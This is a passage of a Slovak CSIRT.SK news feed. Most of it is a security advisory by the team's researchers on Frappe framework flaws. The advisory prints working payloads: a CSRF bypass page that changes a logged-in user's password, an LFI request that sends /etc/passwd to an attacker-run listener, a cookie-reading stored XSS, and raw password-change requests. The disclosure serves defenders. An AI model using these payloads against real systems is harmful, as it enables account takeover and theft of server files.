<p>Certifikácia bola výsledkom externého auditu tímu. V prvej polovici roku 2024 požiadali členovia VJ CSIRT o vykonanie medzinárodnej certifikácie „SIM3 Trusted introducer – certified“. Následne počas roka viacerí členovia VJ CSIRT pracovali na zosúladení procesov s&nbsp;požiadavkami a zvyšovaní efektivity fungovania celej jednotky. Audit sa uskutočnil počas 10. a 11. decembra za osobnej prítomnosti audítorky, riaditeľky CERT.LV, lotyšského CERTu (organizácia v Lotyšsku zastrešujúca všetku agendu súvisiacu s kybernetickou bezpečnosťou v krajine).</p>



<p>Získanie štatútu certifikovaného tímu umožní ešte lepšiu spoluprácu a&nbsp;výmenu informácií VJ CSIRT na medzinárodnej úrovni a&nbsp;efektívnejšiu komunikáciu počas incidentov s inými jednotkami CSIRT ako aj inými organizáciami zaoberajúcimi sa kybernetickou bezpečnosťou. CSIRT.SK sa zaradila medzi rešpektované organizácie kybernetickej bezpečnosti v Európskej únii.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2405/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Pripravili sme pre vás návody ako používať a odhaľovať generatívnu AI</title>
		<link>/posts/2401</link>
					<comments>/posts/2401#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 03 Jun 2025 08:45:37 +0000</pubDate>
				<category><![CDATA[Aktualita]]></category>
		<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[AI]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=2401</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/csirt-1.png" alt="" /></p>CSIRT.SK pre vás pripravil prehľadné návody, ako používať generatívne modely AI z pohľadu kybernetickej a informačnej bezpečnosti, a tiež ako...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/csirt-1.png" alt="" /></p>
<p>CSIRT.SK pre vás pripravil prehľadné návody, <a href="https://csirt.sk/wp-content/uploads/2025/06/Ako_pouzivat_AI.pdf" data-type="link" data-id="/wp-content/uploads/2025/06/Ako_pouzivat_AI.pdf">ako používať</a> generatívne modely AI z pohľadu kybernetickej a informačnej bezpečnosti, a tiež <a href="https://csirt.sk/wp-content/uploads/2025/06/Ako_odhalovat_AI.pdf" data-type="link" data-id="/wp-content/uploads/2025/06/Ako_odhalovat_AI.pdf">ako odhaľovať</a> texty písané, či inšpirované modelmi AI. Veríme, že využitie si nájdu medzi učiteľmi, ale aj u všetkých, ktorí sa zaujímajú o tému AI a chcú bezpečne narábať so svojimi údajmi.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2401/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosti Frappe Framework</title>
		<link>/posts/2370</link>
					<comments>/posts/2370#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 19 May 2025 15:12:28 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[CSRF]]></category>
		<category><![CDATA[Frappe]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<category><![CDATA[XSS]]></category>
		<guid isPermaLink="false">/?p=2370</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/05/frappe.png" alt="" /></p>Zhrnutie Stručný prehľad pythonovského frameworku Frappe, ktorý vykonali výskumníci CSIRT.SK, odhalil množstvo zraniteľností umožňujúcich útočníkom vykonávať rôzne druhy útokov. V...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/05/frappe.png" alt="" /></p>
<h2 class="wp-block-heading">Zhrnutie</h2>



<p>Stručný prehľad pythonovského frameworku Frappe, <strong>ktorý vykonali výskumníci CSIRT.SK</strong>, odhalil množstvo zraniteľností umožňujúcich útočníkom vykonávať rôzne druhy útokov. V základni kódu sa môže nachádzať množstvo ďalších chýb, ktoré len čakajú na objavenie.</p>



<p>Kód všetkých ukážok zneužitia zraniteľností je k dispozícii v <a href="https://github.com/Habuon/Frappe-Exploits" data-type="link" data-id="https://github.com/Habuon/Frappe-Exploits">repozitári github</a>.</p>



<p>Všetky tieto zraniteľnosti boli otestované na frappe docker s obrazom <em>frappe/erpnext:v15.54.4</em>. Podľa našej vedomosti všetky exploity stále fungujú vo <em>frappe/erpnext:v15.57.0</em> okrem obídenia CSRF. Je možné, že v novších verziách budú tieto zraniteľnosti opravené, keďže boli autorom nahlásené už pred niekoľkými mesiacmi. V prvej časti tohto článku si prejdeme konfiguráciu lokálneho prostredia na testovanie diskutovaných zraniteľností. Ak už máte spustený cieľ frappe, pokojne túto časť preskočte.</p>



<h2 class="wp-block-heading">Konfigurovanie lokálneho testovacieho prostredia</h2>



<p>Na nastavenie lokálneho testovacieho prostredia je potrebné mať nainštalovaný docker. Nakonfigurovanie pozostáva z troch hlavných krokov.</p>



<h3 class="wp-block-heading">1.&nbsp;&nbsp;&nbsp; Vytvorenie kontajnera docker</h3>



<p>1. Stiahnite si oficiálny repozitár github</p>



<p><code>git clone https://github.com/frappe/frappe_docker</code></p>



<p>2. V priečinku frappe_docker v súbore pwd.yml zmeňte všetky verzie obrazu frappe/erpnext na v15.54.4</p>



<p><code>sed -i -e "s/frappe\/erpnext:.*$/frappe\/erpnext:v15.54.4/g" pwd.yml</code></p>



<p>3. Pridajte súbor <em>config.json</em> do priečinku frappe_docker s nasledovným obsahom:</p>



<p><code>{<br>&nbsp;&nbsp;&nbsp; "db_host": "db",<br>&nbsp;&nbsp;&nbsp; "db_port": 3306,<br>&nbsp;&nbsp;&nbsp; "redis_cache": "redis://redis-cache:6379",<br>&nbsp;&nbsp;&nbsp; "redis_queue": "redis://redis-queue:6379",<br>&nbsp;&nbsp;&nbsp; "redis_socketio": "redis://redis-queue:6379",<br>&nbsp;&nbsp;&nbsp; "socketio_port": 9000,<br>&nbsp;&nbsp;&nbsp; "allowed_referrers": ["example.com"]<br>}</code></p>



<p>Dôležitou časťou je <em>allowed_referrers</em>, ktorá je jednou zo zraniteľných funkcií.</p>



<p>4. Pridajte nový <em>volume</em> pre frontendovú službu v súbore <em>pwd.yml</em>, aby ste prepojili konfiguráciu spoločnej lokality so službou frappe. <em>Volumes</em> pre službu frontend by mali vyzerať nasledovne:</p>



<p><code>volumes:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br>&nbsp; - sites:/home/frappe/frappe-bench/sites<br>&nbsp; - logs:/home/frappe/frappe-bench/logs&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;<br>&nbsp; - ./config.json:/var/www/html/sites/common_site_config.json</code></p>



<p>5. Pridajte službu ldap v súbore<em> pwd.yml</em> aby bolo možné neskôr povoliť autentifikáciu ldap vo Frappe.</p>



<p><code>openldap:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; image: osixia/openldap<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; container_name: openldap<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; environment:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; LDAP_LOG_LEVEL: "256"<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; LDAP_ORGANISATION: "Example Inc."<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; LDAP_DOMAIN: "example.org"<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; LDAP_BASE_DN: ""<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; LDAP_ADMIN_PASSWORD: "admin"<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; LDAP_CONFIG_PASSWORD: "config"<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; LDAP_READONLY_USER: "false"<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; LDAP_RFC2307BIS_SCHEMA: "false"<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; LDAP_BACKEND: "mdb"<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; LDAP_TLS: "true"<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; LDAP_TLS_CRT_FILENAME: "ldap.crt"<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;LDAP_TLS_KEY_FILENAME: "ldap.key"<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; LDAP_TLS_DH_PARAM_FILENAME: "dhparam.pem"<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; LDAP_TLS_CA_CRT_FILENAME: "ca.crt"<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; LDAP_TLS_ENFORCE: "false"<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; LDAP_TLS_CIPHER_SUITE: "SECURE256:-VERS-SSL3.0"<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; LDAP_TLS_VERIFY_CLIENT: "demand"<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; LDAP_REPLICATION: "false"<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; LDAP_REMOVE_CONFIG_AFTER_SETUP: "true"<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; LDAP_SSL_HELPER_PREFIX: "ldap"<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; stdin_open: true<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; volumes:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - /var/lib/ldap<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - /etc/ldap/slapd.d<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - /container/service/slapd/assets/certs/<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ports:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - "389:389"<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - "636:636"<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; domainname: "example.org"<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hostname: "ldap-server"<br>phpldapadmin:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; image: osixia/phpldapadmin:latest<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; container_name: phpldapadmin<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; environment:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; PHPLDAPADMIN_LDAP_HOSTS: "openldap"<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; PHPLDAPADMIN_HTTPS: "false"<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ports:<br>&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;- "8888:80"<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; depends_on:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - openldap</code></p>



<p>6. Nakoniec jednoducho spustite docker compose ako v bežnej inštalácii Frappe docker.</p>



<p><code>docker compose -f pwd.yml up -d</code></p>



<h3 class="wp-block-heading">2.&nbsp;&nbsp;&nbsp; Inštalácia Frappe</h3>



<p>Tento krok je jednoduchý. Stačí prejsť na <code>:8080</code> a prejsť krokmi inštalácie. Predvolené prihlasovacie údaje používateľa sú Administrator:admin. Dokončenie inštalácie môže chvíľu trvať.</p>



<h3 class="wp-block-heading">3.&nbsp;&nbsp;&nbsp; Konfigurácia LDAP</h3>



<h4 class="wp-block-heading"><strong>1.1. &nbsp;Konfigurácia autentifikácie LDAP vo Frappe</strong></h4>



<p>Po prihlásení ako Administrator choďte na <code>:8080/app/ldap-settings</code>.</p>



<p>V konfigurácii urobte nasledujúce nastavenia:</p>



<ul>
<li>Directory Server: OpenLDAP</li>



<li>LDAP Server Url: ldap://openldap:389</li>



<li>Base Distinguished Name (DN): cn=admin,dc=example,dc=org</li>



<li>Password for Base DN: admin</li>



<li>LDAP search path for Users: dc=example,dc=org</li>



<li>LDAP search path for Groups: dc=example,dc=org</li>



<li>LDAP Search String: (&amp;(objectClass=posixAccount)(uid={0}))</li>



<li>LDAP Email Field: mail</li>



<li>LDAP Username Field: uid</li>



<li>LDAP First Name Field: mail</li>



<li>Default User Type: Website User</li>
</ul>



<p>Zaškrtnite pole Enabled a uložte nastavenia.</p>



<h4 class="wp-block-heading"><strong>1.2. &nbsp;Naplňte databázu LDAP testovacími dátami</strong></h4>



<p>Keď máte pripravené dockerovské testovacie prostredie, skontrolujte ID kontajnera openldap a spustite v ňom shell.</p>



<ul>
<li>Pre získanie ID zadajte nasledujúci príkaz:</li>
</ul>



<p><code>docker ps | grep openldap | awk '{print $1}'</code></p>



<ul>
<li>V našom prípade je výsledok <code>26dbb5abd343</code></li>



<li>Spustite BASH v kontajneri pomocou nasledujúceho príkazu:</li>
</ul>



<p><code>docker exec -it 26dbb5abd343 /bin/bash</code></p>



<ul>
<li>Zapíšte nasledujúce riadky do sample.ldif:</li>
</ul>



<p><code># Organizational Units</code></p>



<p><code>dn: ou=Users,dc=example,dc=org<br>objectClass: organizationalUnit<br>ou: Users</code></p>



<p><code># Sample Users<br>dn: uid=jdoe,ou=Users,dc=example,dc=org<br>objectClass: inetOrgPerson<br>objectClass: posixAccount<br>objectClass: shadowAccount<br>cn: John Doe<br>sn: Doe<br>givenName: John<br>uid: jdoe<br>mail: jdoe@example.org<br>uidNumber: 1001<br>gidNumber: 1001<br>homeDirectory: /home/jdoe<br>userPassword: {SSHA}C3xHC0Sg2llL/qbDdyZIFmEo/OU3VYQo</code></p>



<ul>
<li>použite <code>ldapadd</code> pre pridanie záznamov do databázy:</li>
</ul>



<p><code>ldapadd -x -D "cn=admin,dc=example,dc=org" -W -f dample.ldif</code></p>



<ul>
<li>zadajte heslo pre ldap (<code>admin</code>), keď si ho aplikácia vyžiada</li>
</ul>



<p>Po ukončení by ste mali mať možnosť prihlásiť sa cez ldap ako <code>jdoe@example.org</code> s heslom <code>jdoe_secure_password</code>.</p>



<h2 class="wp-block-heading">Objavené zraniteľnosti</h2>



<h3 class="wp-block-heading">1.&nbsp;&nbsp;&nbsp;&nbsp; Cross-Site Request Forgery (CSRF)</h3>



<p>Pre dosiahnutie CSRF vo frameworku Frappe potrebujeme zneužiť dve chyby zabezpečenia.</p>



<h4 class="wp-block-heading"><strong>1.1.&nbsp;&nbsp; </strong><strong>Obídenie validácie CSRF</strong></h4>



<p>Prvá chyba vznikla po pridaní commitu v novembri 2024 (<a href="https://github.com/frappe/frappe/commit/d4382dc02055ff19966f71ab1579ffaa22c1a0a8">https://github.com/frappe/frappe/commit/d4382dc02055ff19966f71ab1579ffaa22c1a0a8</a>). Zraniteľná metóda, ktorá túto chybu obsahuje, je <em>is_allowed_referrer</em>.</p>



<p><code>def is_allowed_referrer(self):<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; referrer = frappe.get_request_header("Referer")<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; origin = frappe.get_request_header("Origin")<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; # Get the list of allowed referrers from cache or configuration<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; allowed_referrers = frappe.cache.get_value(<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "allowed_referrers",<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; generator=lambda: frappe.conf.get("allowed_referrers", []),<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; )<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; # Check if the referrer or origin is in the allowed list<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return (referrer and any(referrer.startswith(allowed) for allowed in allowed_referrers)) or (<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; origin and any(origin == allowed for allowed in allowed_referrers)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; )</code></p>



<p>Kontrola overuje iba to, či zadaný referrer začína povoleným referrerom. To znamená, že ak vývojár povolí doménu example.com, útočník môže použiť napríklad doménu example.com.attacker.com, ktorá prejde kontrolou. Útočník tak úspešne obíde overenie CSRF.</p>



<h4 class="wp-block-heading"><strong>1.2.&nbsp;&nbsp; Spracúvanie požiadaviek GET a POST rovnakým spôsobom</strong></h4>



<p>Frappe CMS v niektorých prípadoch vo svojich obslužných programoch API spracúva požiadavky GET rovnakým spôsobom ako požiadavky POST. To umožňuje útočníkovi obísť atribút <code>SameSite=Lax</code> nastavený v session cookie.</p>



<p>Napríklad pri volaní koncového bodu API <code>/api/method/frappe.utils.print_format.report_to_pdf</code> môže útočník použiť požiadavku GET alebo POST na spustenie generovania PDF, čo uľahčuje zneužitie zraniteľnosti CSRF.</p>



<h4 class="wp-block-heading"><strong>1.3.&nbsp;&nbsp; Jednoduchý príklad zneužitia zraniteľnosti CSRF</strong></h4>



<p>Ak útočník umiestni na svoju doménu <code>example.com.attacker.com</code> nasledujúci obsah HTML, môže zmeniť heslo návštevníka, ktorý je prihlásený do Frappe umiestneného na <code>example.com</code> (detailnejšie pri zraniteľnosti č. 3).</p>



<p><code>&lt;meta<strong> </strong>http-equiv="refresh" content="0; url=http://example.com/api/method/frappe.desk.page.user_profile.user_profile.update_profile_info?profile_info=%7b%22new_password%22%3a%20%22TestPassword123456%3f%22%7d"/&gt;</code></p>



<p>Keďže toto presmerovanie uskutočňuje požiadavku typu GET, session cookies budú odoslané spolu s požiadavkou kvôli atribútu <code>SameSite=Lax</code>. Hlavička Referrer bude tiež nastavená na <code>example.com.attacker.com</code>, prejde kontrolou <em>is_allowed_referrer</em> a úspešne sa vykoná.</p>



<p>Ďalším spôsobom zneužitia CSRF je útok na webový server pomocou LFI zneužívajúc <strong>CVE-2025-26240</strong>. Ak by bol obsah http na serveri útočníka nasledovný, útočník by videl obsah /etc/passwd odosielaný na jeho server počúvajúci na <code>http://172.17.0.1:8888</code>.</p>



<p><code>&lt;meta<strong> </strong>http-equiv="refresh" content="0; url=http://example.com/api/method/frappe.utils.print_format.report_to_pdf?html=&lt;meta+name%3d'pdfkit-print-media-type'+content%3d''&gt;&lt;meta+name%3d'pdfkit-background'+content%3d''&gt;&lt;meta+name%3d'pdfkit-images'+content%3d''&gt;&lt;meta+name%3d'pdfkit-quiet'+content%3d''&gt;&lt;meta+name%3d'pdfkit-encoding'+content%3d''&gt;&lt;meta+name%3d'pdfkit-margin-right'+content%3d''&gt;&lt;meta+name%3d'pdfkit-margin-left'+content%3d''&gt;&lt;meta+name%3d'pdfkit-margin-top'+content%3d''&gt;&lt;meta+name%3d'pdfkit-margin-bottom'+content%3d''&gt;&lt;meta+name%3d'pdfkit-cookie-jar'+content%3d''&gt;&lt;meta+name%3d'pdfkit-page-size'+content%3d''&gt;&lt;meta+name%3d'pdfkit-quiet'+content%3d''&gt;+&lt;meta+name%3d'pdfkit---disable-local-file-access'+content%3d''&gt;+&lt;meta+name%3d'pdfkit---allow'+content%3d'/etc'&gt;+&lt;meta+name%3d'pdfkit---post-file'+content%3d''&gt;+&lt;meta+name%3d'pdfkit-file--a'+content%3d'/etc/passwd'&gt;+&lt;meta+name%3d'pdfkit-http%3a//172.17.0.1%3a8888%3fLFI-TEST%3d--'+content%3d'--cache-dir'&gt;+&lt;h1&gt;LFI+POC&lt;/h1&gt;"/&gt;</code></p>



<h3 class="wp-block-heading">2.&nbsp;&nbsp;&nbsp;&nbsp; Stored XSS</h3>



<p>Keď odošleme požiadavku POST obsahujúcu napríklad <code>{"user_image":"http://\"&gt;&lt;img src=x onerror=console.log(document.cookie)&gt;"}</code> ako hodnotu parametra <em>profile_info</em>, môžeme vidieť, že obrázok je vykreslený a cookies dokumentu sú zaznamenané v konzole.</p>



<p><strong>Požiadavka:</strong></p>



<p><code>POST /api/method/frappe.desk.page.user_profile.user_profile.update_profile_info HTTP/1.1 Host: localhost:8080<br>X-Frappe-CSRF-Token: 1a34e75a0c0471bf0138c5ab966040a59a2f5290f811314f19bb85c3<br>Cookie: sid=1612f02626922182dfbe581e3f3961a9c36ef1b14efa7b26f880715a<br>Content-Length: 128<br>Content-Type: application/x-www-form-urlencoded<br>&nbsp;<br>profile_info=%7b%22user_image%22%3a%22http%3a%2f%2f%5c%22%3e%3cimg%20src%3dxyz%20onerror%3dconsole.log(document.cookie)%3e%22%7d</code></p>



<p><strong>Výsledok:</strong></p>



<figure class="wp-block-image size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="676" src="/wp-content/uploads/2025/05/Frappe01-1024x676.png" alt="" class="wp-image-2371" style="width:840px;height:auto"/></figure>



<p>Tento payload sa prejavuje aj na stránke :8080/app/home, hoci nie je viditeľný pre používateľa (payload sa stále vykonáva).</p>



<h3 class="wp-block-heading">3.&nbsp;&nbsp;&nbsp;&nbsp; Zmena hesla</h3>



<p>Útočník môže zmeniť heslo overeného používateľa aj bez toho, aby poznal jeho aktuálne heslo. To možno dosiahnuť odoslaním payloadu JSON <code>{"new_password":" 0xdeadbeef"}</code> do parametra <code>profile_info</code> v koncovom bode <code>/api/method/frappe.desk.page.user_profile.user_profile.update_profile_info</code>.</p>



<p><strong>Požiadavka:</strong></p>



<p><code>POST /api/method/frappe.desk.page.user_profile.user_profile.update_profile_info HTTP/1.1<br>Host: localhost:8080<br>Cookie: system_user=no; user_image=; sid=c75135de8c12dbcaa933e6f92901703828da54eb463148587d323767; full_name=test; user_id=test%40test.test<br>Content-Type: application/x-www-form-urlencoded<br>Content-Length: 44<br></code><br><code>profile_info={"new_password"%3a"0xdeadbeef"}</code></p>



<p><strong>Odpoveď:</strong></p>



<p><code>HTTP/1.1 200 OK<br>Server: nginx/1.22.1<br>Date: Fri, 16 May 2025 09:11:03 GMT<br>Content-Type: application/json<br><strong>&lt;SNIP&gt;</strong></code></p>



<p>Po úspešnom odoslaní požiadavky sa môže používateľ prihlásiť novým heslom.</p>



<p><strong>Požiadavka:</strong></p>



<p><code>POST /login HTTP/1.1<br>Host: localhost:8080<br>Content-Length: 43<br>Content-Type: application/x-www-form-urlencoded<br><br>cmd=login&amp;usr=test@test.test&amp;pwd=0xdeadbeef</code></p>



<p><strong>Odpoveď:</strong></p>



<p><code>HTTP/1.1 200 OK<br>Server: nginx/1.22.1<br>Set-Cookie: sid=5fbcd629e3d859ba69acfd8718ae79d6dac5d40b2754dafa7f6e859a; Expires=Fri, 23 May 2025 11:14:03 GMT; Max-Age=612000; HttpOnly; Path=/; SameSite=Lax<br><strong>&lt;SNIP&gt;</strong></code></p>



<p>V kombinácii s obídením CSRF môže táto zraniteľnosť viesť k úplnému ovládnutiu používateľského konta.</p>



<p>Na zneužitie obídenia CSRF je potrebné najprv odoslať POST požiadavku na zmenu hesla a potom je možné heslo zmeniť aj pomocou GET požiadaviek nasledovne.</p>



<p><strong>Požiadavka:</strong></p>



<p><code>GET /api/method/frappe.desk.page.user_profile.user_profile.update_profile_info?profile_info={"new_password"%3a"0xdeadbeef123"} HTTP/1.1<br>Host: localhost:8080<br>Cookie: sid=a4c9818f005fa628d936b0937e0b8da3486167b11ff1ff9a87767ab7</code></p>



<p><strong>Odpoveď:</strong></p>



<p><code>HTTP/1.1 200 OK<br>Server: nginx/1.22.1<br>Date: Fri, 16 May 2025 09:32:12 GMT<br>Content-Type: application/json<br>Content-Length: 2044<br><strong>&lt;SNIP&gt;</strong></code></p>



<p>Po zmene hesla sa môže používateľ prihlásiť s novými údajmi <strong>0xdeadbeef123</strong>.</p>



<p><strong>Požiadavka:</strong></p>



<p><code>POST /login HTTP/1.1<br>Host: localhost:8080<br>X-Requested-With: XMLHttpRequest<br>Content-Length: 47<br>Content-Type: application/x-www-form-urlencoded<br><br>cmd=login&amp;usr=test1@test.test&amp;pwd=0xdeadbeef123</code></p>



<p><strong>Odpoveď:</strong></p>



<p><code>HTTP/1.1 200 OK<br>Server: nginx/1.22.1<br>Date: Fri, 16 May 2025 09:32:18 GMT<br>Content-Type: application/json<br>Content-Length: 57<br>Connection: keep-alive<br>Set-Cookie: sid=aecdcadc69852d2b9874d238b9ae3bb4206f70d27af00b92e8ee9b10; Expires=Fri, 23 May 2025 11:32:18 GMT; Max-Age=612000; HttpOnly; Path=/; SameSite=Lax<br><strong>&lt;SNIP&gt;</strong></code></p>



<p>Zistili sme, že toto správanie je príliš nedeterministické na to, aby sa dalo ľahko zneužiť, ale rozhodli sme sa ho zahrnúť do článku, pretože je to problém a vektor útoku nie je príliš zložitý.</p>



